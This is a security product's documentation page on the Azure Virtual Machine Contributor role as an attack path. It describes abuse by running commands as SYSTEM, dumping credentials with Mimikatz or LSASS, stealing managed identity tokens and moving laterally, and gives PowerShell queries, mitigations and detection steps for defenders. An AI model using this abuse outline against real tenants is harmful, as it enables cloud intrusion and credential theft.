> For the complete documentation index, see [llms.txt](https://docs.forestall.io/fsprotect/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.forestall.io/fsprotect/edges/azure/az_vm_contributor.md). # AZ\_VM\_CONTRIBUTOR ## Summary | | | | ----------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | **FSProtect ACL Alias** | AZ\_VM\_CONTRIBUTOR | | **Azure Alias** | Virtual Machine Contributor (Azure RBAC) | | **Affected Object Types** | Virtual Machines, VM Scale Sets | | **Exploitation Certainty** | Certain | | **Azure RBAC Role** | Virtual Machine Contributor (`9980e02c-c2be-4d73-94e8-173b1dc7cf3c`) — manage VMs but not access to them or the virtual network/storage they are connected to | | **Azure RBAC Role (Classic)** | Classic Virtual Machine Contributor (`d73bb868-a0df-4d4d-bd69-98a00b01fccb`) — manage classic VMs but not access to them or the virtual network/storage they are connected to | ## Description `AZ_VM_CONTRIBUTOR` represents the Azure Resource Manager **Virtual Machine Contributor** role assignment. The **Classic Virtual Machine Contributor** role (`d73bb868-a0df-4d4d-bd69-98a00b01fccb`) provides the same level of access for classic (ASM) VMs and carries the same abuse potential. This role grants almost all abusable privileges against Virtual Machines, including: * **Run commands** on the VM as SYSTEM via the RunCommand API. * **Manage VM configurations** — start, stop, restart, resize, delete. * **Manage extensions** — install custom script extensions to execute arbitrary code. * **Manage disks** — attach/detach data disks, snapshot OS disks. The most critical abuse vector is the ability to run commands on the VM as SYSTEM, which enables: * Full compromise of the VM operating system. * Credential harvesting from memory (Mimikatz, LSASS dumps). * Lateral movement to on-premises infrastructure if the VM is domain-joined. * Access to managed identity tokens for further Azure pivoting. ## Identification ### PowerShell (Az Module) ```powershell Connect-AzAccount # List all Virtual Machine Contributor role assignments Get-AzRoleAssignment -RoleDefinitionName "Virtual Machine Contributor" | Select-Object DisplayName, SignInName, ObjectType, Scope | Format-Table -AutoSize # List Classic Virtual Machine Contributor role assignments Get-AzRoleAssignment -RoleDefinitionName "Classic Virtual Machine Contributor" | Select-Object DisplayName, SignInName, ObjectType, Scope | Format-Table -AutoSize # List VM Contributor at a specific scope Get-AzRoleAssignment -RoleDefinitionName "Virtual Machine Contributor" ` -Scope "/subscriptions//resourceGroups/" | Select-Object DisplayName, SignInName, ObjectType, Scope | Format-Table -AutoSize ``` ### Azure GUI 1. Open **Azure Portal** → navigate to the target **Virtual Machine**. 2. Go to **Access control (IAM)** → **Role assignments**. 3. Filter by **Role = Virtual Machine Contributor** or **Classic Virtual Machine Contributor**. 4. Review all principals listed. ## Exploitation The VM Contributor role enables full abuse of Virtual Machines through RunCommand execution, managed identity token theft, and extension deployment. See the following edges for specific exploitation techniques: > **Related Attack Paths:** > > * [AZ\_EXECUTE\_COMMAND](https://docs.forestall.io/fsprotect/edges/azure/az_execute_command) — Run commands as SYSTEM on VMs via RunCommand API, steal managed identity tokens. ## Mitigation 1. **Minimize Virtual Machine Contributor assignments** * Go to **Azure Portal** → target VM → **Access control (IAM)** → **Role assignments**. * Remove any principal that does not need to manage VMs. * Use **Virtual Machine User Login** or **Virtual Machine Administrator Login** for access without management privileges. 2. **Use PIM for just-in-time access** * Configure eligible assignments instead of permanent ones. 3. **Restrict RunCommand API** * Use Azure Policy to deny `Microsoft.Compute/virtualMachines/runCommand/action` where not needed. 4. **Enable endpoint protection** * Deploy Microsoft Defender for Endpoint or equivalent EDR on all VMs. ## Detection Monitor RunCommand executions and VM management operations. * Go to **Azure Portal** → **Monitor** → **Activity log**. * Filter by **Operation name**: `Microsoft.Compute/virtualMachines/runCommand/action`. * Alert on: * RunCommand invocations from unusual identities. * Custom script extension installations. * VM actions outside change management windows. ## References * * * * --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.forestall.io/fsprotect/edges/azure/az_vm_contributor.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.